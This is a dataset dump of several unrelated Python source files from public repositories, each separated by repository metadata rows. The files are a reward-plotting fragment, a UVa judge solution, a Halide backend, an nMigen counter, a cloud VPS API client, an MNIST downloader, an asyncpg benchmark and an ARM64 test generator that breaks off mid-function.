total_ra = hist['ep_r_a']
total_rp = hist['ep_r_p']
total_ext_ra = hist['ext_ep_r_a']
total_ext_rp = hist['ext_ep_r_p']
if not plot_smoothed_only:
ax0.plot(total_ra, color='b', alpha=0.2)
ax0.plot(total_ext_ra, color='r', alpha=0.2)
ax0.plot(*smooth_plot(total_ra, window=100), color='b')
ax0.plot(*smooth_plot(total_ext_ra, window=100), color='r')
ax0.grid(b=True)
if not plot_smoothed_only:
ax4.plot(total_rp, color='b', alpha=0.2)
ax4.plot(total_ext_rp, color='r', alpha=0.2)
ax4.plot(*smooth_plot(total_rp, window=100), color='b')
ax4.plot(*smooth_plot(total_ext_rp, window=100), color='r')
ax4.grid(b=True)
max_h = max(hist['mi-last_effort'].keys())
min_h = min(hist['mi-last_effort'].keys())
ax1.imshow(np.array(hist['mi-last_effort'][min_h]), vmin=0, vmax=2.5)
ax2.imshow(np.array(hist['mi-last_individual_outputs'][min_h]), vmin=0, vmax=2.5)
ax3.imshow(np.array(hist['mi-last_wage_hours_output_time'][min_h]), vmin=0, vmax=2.5)
ax0.set_title('Agent Reward')
ax4.set_title('Principal Reward (includes MI cost)')
ax1.set_title(f'MI: Effort {min_h}')
ax2.set_title(f'MI: Individual Outputs {min_h}')
ax3.set_title(f'MI: Others {min_h}')
ax5.imshow(np.array(hist['mi-last_effort'][max_h]), vmin=0, vmax=2.5)
ax6.imshow(np.array(hist['mi-last_individual_outputs'][max_h]), vmin=0, vmax=2.5)
ax7.imshow(np.array(hist['mi-last_wage_hours_output_time'][max_h]), vmin=0, vmax=2.5)
ax5.set_title(f'MI: Effort {max_h}')
ax6.set_title(f'MI: Individual Outputs {max_h}')
ax7.set_title(f'MI: Others {max_h}')
# ###### Function for naming savefiles #########################################
def get_savestr_allh(folder, principal_effort_mi_cost, principal_output_mi_cost, normalize_t, *args, **kwargs):
effort_name = f'mipe{principal_effort_mi_cost:.2f}'
output_name = f'mipe{principal_output_mi_cost:.2f}'
normalize_name = f'nt{int(normalize_t)}'
return f'{folder}/{effort_name}_{normalize_name}_{output_name}'
| 35.313253 | 230 | 0.585579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,117 | 0.24076 |
950a7c06be019526c5d13e887a482057df6c98cd
| 758 |
py
|
Python
|
UVa Online Judge/v128/12808.py
|
mjenrungrot/algorithm
|
e0e8174eb133ba20931c2c7f5c67732e4cb2b703
|
[
"MIT"
] | 1 |
2021-12-08T08:58:43.000Z
|
2021-12-08T08:58:43.000Z
|
UVa Online Judge/v128/12808.py
|
mjenrungrot/algorithm
|
e0e8174eb133ba20931c2c7f5c67732e4cb2b703
|
[
"MIT"
] | null | null | null |
UVa Online Judge/v128/12808.py
|
mjenrungrot/algorithm
|
e0e8174eb133ba20931c2c7f5c67732e4cb2b703
|
[
"MIT"
] | null | null | null |
# =============================================================================
# Author: Teerapat Jenrungrot - https://github.com/mjenrungrot/
# FileName: 12808.py
# Description: UVa Online Judge - 12808
# =============================================================================
import math
def run():
line = input()
L, D, H, V = list(map(float, line.split()))
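    # Horizontal projectile: fall time t = sqrt(2*h/g), horizontal distance x = v*t.
    # The /1000.0 factors presumably convert the input units to metres.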
t = math.sqrt(2.0 * (H / 1000.0) / 9.81)
x = (V / 1000.0) * t
if x < D / 1000.0 - 0.5 or x > (D + L) / 1000.0 + 0.5:
print("FLOOR")
elif x <= D / 1000.0 + 0.5 or x >= (D + L) / 1000.0 - 0.5:
print("EDGE")
else:
print("POOL")
if __name__ == "__main__":
T = int(input())
for i in range(T):
run()
| 27.071429 | 79 | 0.387863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 332 | 0.437995 |
950ac99a04713eeb0672575cefd8c1ec3997841b
| 4,377 |
py
|
Python
|
cnn_implementer/backends/halide.py
|
lwaeijen/cnn-mapping-tool
|
a41c2dccb820f6227ddb6d75af9213e187744826
|
[
"MIT"
] | null | null | null |
cnn_implementer/backends/halide.py
|
lwaeijen/cnn-mapping-tool
|
a41c2dccb820f6227ddb6d75af9213e187744826
|
[
"MIT"
] | null | null | null |
cnn_implementer/backends/halide.py
|
lwaeijen/cnn-mapping-tool
|
a41c2dccb820f6227ddb6d75af9213e187744826
|
[
"MIT"
] | null | null | null |
import os
import jinja2
import networkx as nx
from ..utils import Logger
from math import ceil, floor
from ..model import Segment
#Add function to Segments that generates unique names for internal nodes
#Function is specific for halide backend, hence it is added here and not in the original definition of Segment
def halide_name(self, layer_name):
def sanitize(s):
return s.replace('/','_')
#if not on of our nodes, don't rename
if layer_name not in self.nodes():
return sanitize(layer_name)
#if an output, don't rename
if layer_name in self.produces:
return sanitize(layer_name)
# This is an internal node, there might be other segments with similar named layers
# return a name with the segment id added
return sanitize(layer_name+'_seg'+str(self.id))
Segment.halide_name=halide_name
class Halide(Logger):
def __init__(self, **kwargs):
#init super
super(Halide, self).__init__(**kwargs)
self.template_dir=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
self.main_template='main.c.j2'
def implement(self, network, networkConfig, DEBUG=False, PROFILING=False, TRACING=False):
self.network = network
#contains the filenames of the binaries
self.params = self.network.weights
#sanity check
assert(self.params and "Can not implement a network if the weights are not specified!")
#convert config segments to real segments
segments=[]
inputs=0
info_msg=['Halide Backend implementing the selected segments:']
for segment_cfg in networkConfig.sorted_segments(self.network):
#Init segment with required layers
segment = Segment(network=network, layers=segment_cfg.layers)
#convert to old-style tuple
segments+=[(segment, segment_cfg)]
#some extra bookkeeping
for layer in segment.get_nodes():
if layer['type'] in ['input']:
inputs+=1
#tell the user what we are up to
info_msg+=[' - '+str(segment)]
self.info('\n'.join(info_msg))
#render main code
code = self.render({
'segments': segments,
'number_inputs': inputs,
'debug': DEBUG,
'PROFILING': PROFILING,
'TRACING': TRACING,
})
#return dictionary with filenames
return code
def render(self, context):
#helper function to translate internal model dimensions to halide backend dimensions
def rename(dim):
rt = {
'x': 'n',
'y': 'm',
'zo': 'o',
'zi': 'i',
'x_i': 'n_i',
'y_i': 'm_i',
'zo_i': 'o_i',
'zi_i': 'i_i',
'x_o': 'n_o',
'y_o': 'm_o',
'zo_o': 'o_o',
'zi_o': 'i_o',
}
assert(dim in rt and "Error: unknown dimension, check your config file and also make sure it is analysed to ensure proper compute levels are defined")
return rt[dim]
def rename_order(order, postfix='', exclude=[]):
return [ rename(dim)+postfix for dim in order if rename(dim)[0] not in exclude]
def jinja_debug(text):
            print('Halide Backend Template Debug: {}'.format(text))
return
#context to pass to jinja
ctxt={
'nx': nx,
'network': self.network,
'rename': rename,
'rename_order': rename_order,
'len': len,
'type': type,
'range': range,
'enumerate': enumerate,
'max': max,
'min': min,
'params': self.params,
'map': map,
'str': str,
'int': int,
'float': float,
'floor': floor,
'ceil': ceil,
'list': list,
}
ctxt.update(context)
#set the environment
env=jinja2.Environment(
loader=jinja2.FileSystemLoader(self.template_dir)
)
#add filter
env.filters['dbg']=jinja_debug
#load template and render
return env.get_template(self.main_template).render(ctxt)
| 31.042553 | 162 | 0.558145 | 3,527 | 0.805803 | 0 | 0 | 0 | 0 | 0 | 0 | 1,429 | 0.326479 |
950b9bd680855e1bc01f2dffb96d063d03df4633
| 137 |
py
|
Python
|
plasmapy/utils/pytest_helpers/__init__.py
|
seanjunheng2/PlasmaPy
|
7b4e4aaf8b03d88b654456bca881329ade09e377
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 429 |
2016-10-31T19:40:32.000Z
|
2022-03-25T12:27:11.000Z
|
plasmapy/utils/pytest_helpers/__init__.py
|
RAJAGOPALAN-GANGADHARAN/PlasmaPy
|
6df9583cc47375687a07300c0aa11ba31634d770
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 1,400 |
2015-11-24T23:00:44.000Z
|
2022-03-30T21:03:25.000Z
|
plasmapy/utils/pytest_helpers/__init__.py
|
RAJAGOPALAN-GANGADHARAN/PlasmaPy
|
6df9583cc47375687a07300c0aa11ba31634d770
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 289 |
2015-11-24T18:54:57.000Z
|
2022-03-18T17:26:59.000Z
|
from plasmapy.utils.pytest_helpers.pytest_helpers import (
assert_can_handle_nparray,
run_test,
run_test_equivalent_calls,
)
| 22.833333 | 58 | 0.79562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
950c169f450a431d53eeadbbe5cd4c9bc80dac22
| 664 |
py
|
Python
|
code/Attack/ParameterTypes/Types.py
|
TomasMadeja/ID2T
|
77f51c074d1ff83c7d648ae62ecaed3e5cfde80c
|
[
"MIT"
] | 33 |
2018-11-21T12:50:52.000Z
|
2022-01-12T05:38:12.000Z
|
code/Attack/ParameterTypes/Types.py
|
TomasMadeja/ID2T
|
77f51c074d1ff83c7d648ae62ecaed3e5cfde80c
|
[
"MIT"
] | 108 |
2018-11-21T12:33:47.000Z
|
2022-02-09T15:56:59.000Z
|
code/Attack/ParameterTypes/Types.py
|
TomasMadeja/ID2T
|
77f51c074d1ff83c7d648ae62ecaed3e5cfde80c
|
[
"MIT"
] | 20 |
2018-11-22T13:03:20.000Z
|
2022-01-12T00:19:28.000Z
|
import enum
class ParameterTypes(enum.Enum):
"""
Defines types for parameters. These types may be used in the specification of allowed parameters within the
individual attack classes. The type is used to verify the validity of the given value.
"""
TYPE_IP_ADDRESS = 0
TYPE_MAC_ADDRESS = 1
TYPE_PORT = 2
TYPE_INTEGER_POSITIVE = 3
TYPE_TIMESTAMP = 4
TYPE_BOOLEAN = 5
TYPE_FLOAT = 6
TYPE_PACKET_POSITION = 7 # used to derive timestamp from parameter INJECT_AFTER_PACKET
TYPE_DOMAIN = 8
TYPE_STRING = 9
TYPE_FILEPATH = 10
TYPE_PERCENTAGE = 11
TYPE_PADDING = 12
TYPE_INTERVAL_SELECT_STRAT = 13
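# Hypothetical illustration (not taken from an actual attack class): an attack could
# declare its supported parameters as a mapping from name to one of these types, e.g.
#   {"ip.src": ParameterTypes.TYPE_IP_ADDRESS, "packets.per-second": ParameterTypes.TYPE_FLOAT}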
| 28.869565 | 111 | 0.712349 | 649 | 0.97741 | 0 | 0 | 0 | 0 | 0 | 0 | 275 | 0.414157 |
950c84ecd7d7ee95d6bf316b3a497327243be4e4
| 1,984 |
py
|
Python
|
utils/error_handlrer.py
|
RobinPaspuel/YtechCode
|
219a8492aa5be76c445f3d70f8b2ef74e81c188e
|
[
"MIT"
] | null | null | null |
utils/error_handlrer.py
|
RobinPaspuel/YtechCode
|
219a8492aa5be76c445f3d70f8b2ef74e81c188e
|
[
"MIT"
] | null | null | null |
utils/error_handlrer.py
|
RobinPaspuel/YtechCode
|
219a8492aa5be76c445f3d70f8b2ef74e81c188e
|
[
"MIT"
] | null | null | null |
from utils.error_with_arrows import *
##### ERRORS ########
class Error:
def __init__(self, initial_pos, final_pos, error_class, details):
self.initial_pos = initial_pos
self.final_pos = final_pos
self.error_class= error_class
self.details= details
def error_string(self):
result = f'{self.error_class}: {self.details}'
        result += f'\nFile {self.initial_pos.filename} at line: {self.initial_pos.line + 1}'
result += '\n\n' + string_with_arrows(self.initial_pos.filetext, self.initial_pos, self.final_pos)
return result
class IllegalCharacter(Error):
def __init__(self,initial_pos, final_pos, details):
super().__init__(initial_pos, final_pos, 'Illegal Character', details)
class ExpectedCharacterError(Error):
def __init__(self,initial_pos, final_pos, details):
super().__init__(initial_pos, final_pos, 'Expected Character', details)
class InvalidSyntax(Error):
def __init__(self,initial_pos, final_pos, details = ''):
super().__init__(initial_pos, final_pos, 'Invalid Syntax', details)
class RunTimeError(Error):
def __init__(self, initial_pos, final_pos, details, context):
super().__init__(initial_pos, final_pos, 'Runtime Error', details)
self.context = context
def error_string(self):
result = self.generate_traceback()
result += f'{self.error_class}: {self.details}\n'
result += '\n\n' + string_with_arrows(self.initial_pos.filetext, self.initial_pos, self.final_pos)
return result
def generate_traceback(self):
result = ''
pos = self.initial_pos
ctx = self.context
while ctx:
result = f' File {pos.filename}, line {str(pos.line + 1)}, in {ctx.context_name}\n' + result
pos = ctx.context_parent_entry_pos
ctx = ctx.context_parent
return 'Traceback (most recent call last):\n' + result
##################################
| 40.489796 | 106 | 0.655242 | 1,880 | 0.947581 | 0 | 0 | 0 | 0 | 0 | 0 | 402 | 0.202621 |
950dcd67a7917370bcc5ec2201e9aaf688e1aa85
| 2,062 |
py
|
Python
|
postgres/python-asyncio/main.py
|
Gelbpunkt/idlebench
|
fe370f9fa6335cf738a91ca818638aedf0cf1ba3
|
[
"Apache-2.0"
] | null | null | null |
postgres/python-asyncio/main.py
|
Gelbpunkt/idlebench
|
fe370f9fa6335cf738a91ca818638aedf0cf1ba3
|
[
"Apache-2.0"
] | null | null | null |
postgres/python-asyncio/main.py
|
Gelbpunkt/idlebench
|
fe370f9fa6335cf738a91ca818638aedf0cf1ba3
|
[
"Apache-2.0"
] | 4 |
2020-08-16T22:23:42.000Z
|
2020-08-17T20:15:33.000Z
|
import asyncio
import asyncpg
VALUES = [
356091260429402122,
"Why are you reading",
9164,
6000000,
14,
0,
0,
0,
463318425901596672,
"https://i.imgur.com/LRV2QCK.png",
15306,
["Paragon", "White Sorcerer"],
0,
0,
647,
"Leader",
None,
0,
"10.0",
"10.0",
30,
2,
1,
0,
0,
"1.0",
None,
0,
"Elf",
2,
2,
0,
0,
0,
{"red": 255, "green": 255, "blue": 255, "alpha": 0.8},
]
VALUES_100 = [VALUES for _ in range(100)]
async def main():
conn = await asyncpg.connect(
user="postgres", password="postgres", database="postgres", host="127.0.0.1"
)
for i in range(1_000):
await conn.executemany(
'INSERT INTO public.profile ("user", "name", "money", "xp", "pvpwins",'
' "money_booster", "time_booster", "luck_booster", "marriage",'
' "background", "guild", "class", "deaths", "completed", "lovescore",'
' "guildrank", "backgrounds", "puzzles", "atkmultiply", "defmultiply",'
' "crates_common", "crates_uncommon", "crates_rare", "crates_magic",'
' "crates_legendary", "luck", "god", "favor", "race", "cv", "reset_points",'
' "chocolates", "trickortreat", "eastereggs", "colour") VALUES ($1, $2, $3,'
" $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19,"
" $20, $21, $22, $23, $24, $25, $26, $27, $28, $29, $30, $31, $32, $33,"
" $34, $35);",
VALUES_100,
)
await conn.fetchrow(
'SELECT * FROM public.profile WHERE "user"=356091260429402122;'
)
await conn.execute(
'UPDATE public.profile SET "crates_common"="crates_common"+1,'
' "crates_uncommon"="crates_uncommon"+1 WHERE "user"=$1;',
356091260429402122,
)
await conn.execute(
'DELETE FROM public.profile WHERE "user"=356091260429402122;'
)
await conn.close()
asyncio.run(main())
| 25.45679 | 88 | 0.511639 | 0 | 0 | 0 | 0 | 0 | 0 | 1,490 | 0.722599 | 1,075 | 0.521339 |
950e90e9549308bcb8380f5876c0fc12c6f68485
| 1,112 |
py
|
Python
|
fv-courseware/exercise-01/counter_formal.py
|
DonaldKellett/nmigen-beginner
|
260ae76a5277e36ec9909aaf6b76acab320aed88
|
[
"MIT"
] | 1 |
2020-11-09T13:34:02.000Z
|
2020-11-09T13:34:02.000Z
|
fv-courseware/exercise-01/counter_formal.py
|
DonaldKellett/nmigen-beginner
|
260ae76a5277e36ec9909aaf6b76acab320aed88
|
[
"MIT"
] | null | null | null |
fv-courseware/exercise-01/counter_formal.py
|
DonaldKellett/nmigen-beginner
|
260ae76a5277e36ec9909aaf6b76acab320aed88
|
[
"MIT"
] | null | null | null |
from nmigen import *
from nmigen.asserts import Assert
from nmigen.cli import main_parser, main_runner
__all__ = ["Counter"]
"""
Simple counter with formal verification
See slides 50-60 in
https://zipcpu.com/tutorial/class-verilog.pdf
"""
class Counter(Elaboratable):
def __init__(self, fv_mode = False):
self.fv_mode = fv_mode
self.i_start_signal = Signal(1, reset=0)
self.counter = Signal(16)
self.o_busy = Signal(1, reset=0)
def ports(self):
return [
self.i_start_signal,
self.counter,
self.o_busy
]
def elaborate(self, platform):
m = Module()
MAX_AMOUNT = Const(22)
with m.If(self.i_start_signal & (self.counter == 0)):
m.d.sync += self.counter.eq(MAX_AMOUNT - 1)
with m.Elif(self.counter != 0):
m.d.sync += self.counter.eq(self.counter - 1)
m.d.comb += self.o_busy.eq(self.counter != 0)
if self.fv_mode:
m.d.comb += Assert(self.counter < MAX_AMOUNT)
return m
if __name__ == "__main__":
parser = main_parser()
args = parser.parse_args()
m = Module()
m.submodules.counter = counter = Counter(True)
main_runner(parser, args, m, ports = counter.ports())
| 25.272727 | 55 | 0.695144 | 671 | 0.603417 | 0 | 0 | 0 | 0 | 0 | 0 | 132 | 0.118705 |
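Besides the formal flow driven through main_parser/main_runner, the Counter above can also be exercised behaviourally with nMigen's built-in simulator. A minimal sketch, assuming an nMigen release where the simulator is importable from nmigen.back.pysim and the Counter class above is in scope:

from nmigen.back.pysim import Simulator  # import path varies between nMigen releases

dut = Counter()
sim = Simulator(dut)
sim.add_clock(1e-6)

def process():
    # Pulse the start signal once, then let the counter run back down to zero.
    yield dut.i_start_signal.eq(1)
    yield
    yield dut.i_start_signal.eq(0)
    for _ in range(30):
        yield

sim.add_sync_process(process)
with sim.write_vcd("counter.vcd"):
    sim.run()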
951023fa012fa8c9f93693ace80f46cf9b0de998
| 10,524 |
py
|
Python
|
regru_cloudapi/__init__.py
|
plvskiy/regru_cloudapi
|
e137a391f67b116f51b77b8e33755f8a6c3b170d
|
[
"MIT"
] | 1 |
2021-03-07T14:25:59.000Z
|
2021-03-07T14:25:59.000Z
|
regru_cloudapi/__init__.py
|
plvskiy/regru_cloudapi
|
e137a391f67b116f51b77b8e33755f8a6c3b170d
|
[
"MIT"
] | null | null | null |
regru_cloudapi/__init__.py
|
plvskiy/regru_cloudapi
|
e137a391f67b116f51b77b8e33755f8a6c3b170d
|
[
"MIT"
] | null | null | null |
import json
import requests
from regru_cloudapi.utils import Errors
class CloudAPI(object):
def __init__(self, token=None):
self.token = token
self.api_url = 'https://api.cloudvps.reg.ru/v1'
self.HEADERS = {'Content-Type': 'application/json'}
if self.token is not None:
self.HEADERS['Authorization'] = f'Bearer {self.token}'
def get_tariffs(self):
data = requests.get(f'{self.api_url}/sizes', headers=self.HEADERS).json()
return data
def get_prices(self):
data = requests.get(f'{self.api_url}/prices', headers=self.HEADERS).json()
return data
def get_balance_data(self):
data = requests.get(f'{self.api_url}/balance_data', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def images(self, param_type):
Errors(parameter=param_type).check_images()
params = {'type': param_type}
data = requests.get(f'{self.api_url}/images', headers=self.HEADERS, params=params).json()
check_data = Errors(data).check_error()
return check_data
def get_ssh_keys(self):
data = requests.get(f'{self.api_url}/account/keys', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def add_ssh_key(self, name, pkey):
data_params = {'name': name,
'public_key': pkey}
data = requests.post(f'{self.api_url}/account/keys',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_ssh_key()
return check_data
def rename_ssh_key(self, name, key_id):
data_params = {'name': name}
data = requests.put(f'{self.api_url}/account/keys/{key_id}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_ssh_key()
return check_data
def delete_ssh_key(self, key_id):
data = requests.delete(f'{self.api_url}/account/keys/{key_id}',
headers=self.HEADERS)
if data.status_code != 204:
check_data = Errors(data.json()).check_ssh_key()
return check_data
else:
return True
def ptr(self, domain, ip):
data_params = {'ptr': domain}
data = requests.put(f'{self.api_url}/ips/{ip}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def get_reglets(self, reglet_id=None):
url = f'{self.api_url}/reglets'
if reglet_id is not None:
url += f'/{reglet_id}'
data = requests.get(url, headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def create_reglet(self, size, image, name=None, isp_license_size=None, ssh_keys=None, backups=None):
data_params = {'size': str(size),
'image': str(image)}
if name is not None:
data_params['name'] = str(name)
if ssh_keys is not None:
data_params['ssh_keys'] = ssh_keys
if backups is not None:
data_params['backups'] = backups
if isp_license_size is not None:
data_params['isp_license_size'] = isp_license_size
data = requests.post(f'{self.api_url}/reglets',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def actions(self, reglet_id, action, size=None, image=None, offline=None, name=None, isp_license_size=None):
Errors(parameter=action).check_actions()
data_params = {'type': action}
if action == 'resize':
if size is not None:
data_params['size'] = size
else:
                raise ValueError('The size value cannot be None')
elif action == 'rebuild' or action == 'restore':
if image is not None:
data_params['image'] = image
else:
                raise ValueError('The image value cannot be None')
elif action == 'clone' or action == 'snapshot':
if offline is not None:
data_params['offline'] = offline
if name is not None:
data_params['name'] = name
elif action == 'resize_isp_license':
if isp_license_size is not None:
data_params['isp_license_size'] = isp_license_size
else:
                raise ValueError('The isp_license_size value cannot be None')
data = requests.post(f'{self.api_url}/reglets/{reglet_id}/actions',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def rename_reglet(self, reglet_id, name):
if name is not None:
data_params = {'name': name}
else:
            raise ValueError('The name variable cannot be None')
data = requests.put(f'{self.api_url}/reglets/{reglet_id}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def delete_reglet(self, reglet_id):
data = requests.delete(f'{self.api_url}/reglets/{reglet_id}',
headers=self.HEADERS)
if data.status_code != 204:
check_data = Errors(data.json()).check_error()
return check_data
else:
return True
def get_removed_reglets(self):
data = requests.get(f'{self.api_url}/removed_servers', headers=self.HEADERS).json()
return data
def get_vnc_url(self, reglet_id):
CloudAPI(self.token).actions(reglet_id, 'generate_vnc_link')
data = requests.get(f'{self.api_url}/reglets/{reglet_id}/vnc_link', headers=self.HEADERS).json()
return data
def get_snapshots(self):
data = requests.get(f'{self.api_url}/snapshots', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def delete_snapshot(self, snap_id):
data = requests.delete(f'{self.api_url}/snapshots/{snap_id}', headers=self.HEADERS)
if data.status_code != 204:
check_data = Errors(data.json()).check_error()
return check_data
else:
return True
def get_additional_ips(self, reglet_id=None, ip=None):
params = {}
if reglet_id is not None:
params['reglet_id'] = reglet_id
if ip is None:
data = requests.get(f'{self.api_url}/ips', headers=self.HEADERS, params=params).json()
else:
data = requests.get(f'{self.api_url}/ips/{ip}', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def add_additional_ips(self, reglet_id, ipv4_count=None, ipv6_count=None):
data_params = {}
if ipv4_count is not None:
data_params['ipv4_count'] = ipv4_count
elif ipv6_count is not None:
data_params['ipv6_count'] = ipv6_count
if data_params is not None:
data_params['reglet_id'] = reglet_id
data = requests.post(f'{self.api_url}/ips', headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
else:
            raise ValueError('Neither of the parameters ipv4_count, ipv6_count was specified')
def delete_additional_ips(self, ip):
if ip is not None:
data = requests.delete(f'{self.api_url}/ips/{ip}', headers=self.HEADERS)
if data.status_code == 204:
return True
else:
check_data = Errors(data.json()).check_error()
return check_data
else:
            raise ValueError('The ip variable cannot be None')
def get_info_action(self, action_id):
data = requests.get(f'{self.api_url}/actions/{action_id}', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def get_vpcs(self):
data = requests.get(f'{self.api_url}/vpcs', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def get_vpcs_info(self, vpcs_id):
data = requests.get(f'{self.api_url}/vpcs/{vpcs_id}', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def add_vpcs(self, name):
data_params = {'name': name}
data = requests.post(f'{self.api_url}/vpcs', headers=self.HEADERS,
data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def rename_vpcs(self, vpcs_id, name):
data_params = {'name': name}
data = requests.put(f'{self.api_url}/vpcs/{vpcs_id}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def delete_vpcs(self, vpcs_id):
data = requests.delete(f'{self.api_url}/vpcs/{vpcs_id}', headers=self.HEADERS)
if data.status_code == 204:
return True
else:
check_data = Errors(data.json()).check_error()
return check_data
def get_vpcs_members(self, vpcs_id):
data = requests.get(f'{self.api_url}/vpcs/{vpcs_id}/members', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def join_vpcs_member(self, reglet_id, vpcs_id):
data_params = {'resource_id': reglet_id}
data = requests.post(f'{self.api_url}/vpcs/{vpcs_id}/members',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def disconnect_vpcs_member(self, reglet_id, vpcs_id):
data = requests.delete(f'{self.api_url}/vpcs/{vpcs_id}/members/{reglet_id}', headers=self.HEADERS)
if data.status_code == 204:
return True
else:
check_data = Errors(data.json()).check_error()
return check_data
| 33.515924 | 114 | 0.601292 | 10,578 | 0.993333 | 0 | 0 | 0 | 0 | 0 | 0 | 1,766 | 0.165837 |
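A hedged usage sketch for the CloudAPI wrapper above; the token and the size/image identifiers are placeholders, not values confirmed by the reg.ru cloud API.

from regru_cloudapi import CloudAPI

api = CloudAPI(token="YOUR_API_TOKEN")  # placeholder token
print(api.get_tariffs())                # helpers return the parsed JSON body

# Hypothetical size/image identifiers -- check the tariff and image listings first.
reglet = api.create_reglet(size="example-size", image="example-image", name="test-vps")
print(reglet)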
9510db3851814a40d1e201c8697a846d403a09e9
| 731 |
py
|
Python
|
mnist/download.py
|
hiroog/cppapimnist
|
30d7e01954fc43da2eea5fe3ebf034b37e79cfd1
|
[
"MIT"
] | null | null | null |
mnist/download.py
|
hiroog/cppapimnist
|
30d7e01954fc43da2eea5fe3ebf034b37e79cfd1
|
[
"MIT"
] | null | null | null |
mnist/download.py
|
hiroog/cppapimnist
|
30d7e01954fc43da2eea5fe3ebf034b37e79cfd1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import urllib.request
import os
import gzip
DOWNLOAD_URL='http://yann.lecun.com/exdb/mnist/'
file_list=[ 'train-images-idx3-ubyte', 'train-labels-idx1-ubyte', 't10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte' ]
for name in file_list:
if not os.path.exists( name ):
gz_name= name + '.gz'
if not os.path.exists( gz_name ):
print( 'download', gz_name )
with urllib.request.urlopen( DOWNLOAD_URL + gz_name ) as fi:
with open( gz_name, 'wb' ) as fo:
fo.write( fi.read() )
print( 'write', name )
with gzip.open( gz_name, 'rb' ) as fi:
with open( name, 'wb' ) as fo:
fo.write( fi.read() )
| 30.458333 | 118 | 0.575923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.253078 |
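The script above only downloads and decompresses the raw files; reading them afterwards relies on the standard IDX layout (a big-endian header followed by uint8 data). A minimal reader under that assumption, using numpy as an extra dependency:

import struct
import numpy as np

def read_idx_images(path):
    # Header: magic, image count, rows, cols -- four big-endian uint32 values.
    with open(path, 'rb') as f:
        _magic, n, rows, cols = struct.unpack('>IIII', f.read(16))
        return np.frombuffer(f.read(), dtype=np.uint8).reshape(n, rows, cols)

def read_idx_labels(path):
    # Header: magic, label count -- two big-endian uint32 values.
    with open(path, 'rb') as f:
        _magic, n = struct.unpack('>II', f.read(8))
        return np.frombuffer(f.read(), dtype=np.uint8)

images = read_idx_images('train-images-idx3-ubyte')
labels = read_idx_labels('train-labels-idx1-ubyte')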
951110f9319a47de447b38bde1aba4ab72ddd1bd
| 2,651 |
py
|
Python
|
arch/arm64/tests/a64_tbnz.py
|
Samsung/ADBI
|
3e424c45386b0a36c57211da819021cb1929775a
|
[
"Apache-2.0"
] | 312 |
2016-02-04T11:03:17.000Z
|
2022-03-18T11:30:10.000Z
|
arch/arm64/tests/a64_tbnz.py
|
NickHardwood/ADBI
|
3e424c45386b0a36c57211da819021cb1929775a
|
[
"Apache-2.0"
] | 4 |
2016-02-04T11:05:40.000Z
|
2017-07-27T04:22:27.000Z
|
arch/arm64/tests/a64_tbnz.py
|
NickHardwood/ADBI
|
3e424c45386b0a36c57211da819021cb1929775a
|
[
"Apache-2.0"
] | 85 |
2016-02-04T12:48:30.000Z
|
2021-01-14T06:23:24.000Z
|
import random
from common import *
class test_a64_tbnz(TemplateTest):
def gen_rand(self):
regs = list(set(GPREGS) - {'x0', 'w0'})
while True:
yield {'insn' : random.choice(['tbz', 'tbnz']),
'reg' : random.choice(regs),
'bit' : random.randint(0,63),
'val' : random.randint(0,1),
'label_idx': random.randint(0, self.__label_count - 1)}
def __init__(self):
self.__label_count = 8
self.symbols = [ __name__ + '_addr_' + str(i) for i in xrange(self.__label_count) ]
randvals = random.sample(xrange(0, 0xfffffffffffffff), 2*self.__label_count)
self.branch = randvals[:self.__label_count]
self.nobranch = randvals[self.__label_count:]
def test_begin(self):
yield ' .arch armv8-a'
yield ' .align 2'
yield ' .text'
for i in xrange(0, len(self.symbols), 2):
yield self.symbols[i] + ':'
yield ' ldr\t\tx0, ={0}'.format(hex(self.branch[i]))
yield ' ret'
yield ' .skip %d' % random.randrange(512, 2048, 4)
def gen_testcase(self, nr, insn, reg, bit, val, label_idx):
label = self.symbols[label_idx]
ret_label = self.testcase_name(nr) + '_ret'
if reg.startswith('w'):
v = random.randint(0,0xffffffff)
bit /= 2
else:
v = random.randint(0,0xfffffffffffffff)
if val == 1:
v |= (0x1 << bit)
else:
v &= ~(0x1 << bit)
state = ProcessorState(setreg={reg:v,
'x0':self.nobranch[label_idx],
'x30':ret_label},
reserve=['x0'])
yield state.prepare()
space = '\t' if insn == 'tbnz' else '\t\t'
